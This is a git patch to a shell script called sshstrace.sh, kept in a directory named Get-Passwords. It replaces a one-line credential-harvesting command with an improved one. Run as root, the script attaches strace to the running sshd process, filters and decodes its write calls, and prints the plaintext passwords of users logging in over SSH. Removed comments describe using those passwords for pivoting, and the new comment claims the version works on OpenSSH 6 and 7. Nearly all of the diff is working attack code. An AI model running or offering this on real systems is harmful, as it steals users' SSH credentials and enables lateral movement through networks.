From ba45d0b945fe75a50416bbd178d067a099ecf79f Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Tue, 25 Jul 2017 14:58:56 -0700
Subject: [PATCH] Update sshstrace.sh

---
 Get-Passwords/sshstrace.sh | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)

diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
index fa846d9..77dd3ea 100644
--- a/Get-Passwords/sshstrace.sh
+++ b/Get-Passwords/sshstrace.sh
@@ -1,9 +1,5 @@
 #!/bin/bash
 #
-# In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
-# Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
-# I think I fixed the random char padding problem, but now perl is required
-# Turns out it also doesn't work if the password is entirely numbers.
-#
+# This one seems pretty effective for OpenSSH 6 and 7.
 
-strace -s 128 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -oP 'write\(4, "\\0\\0\\0\\[\d]*[^\\]{2,}[^\\0]"' | perl -pe 's/write\(4, "\\0\\0\\0\\([\d]+|[\w])(.*)"/\2/g'
+strace -xx -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -P 'write\(4, "\\x00' | perl -lne '$|++; @F=/"\s*([^"]+)\s*"/g;for (@F){tr/\\x//d}; print for @F'|grep --line-buffered -oP '.{8}\K([2-7][0-9a-f])*$'|grep --line-buffered -v '^64$'|perl -pe 's/([0-9a-f]{2})/chr hex $1/gie'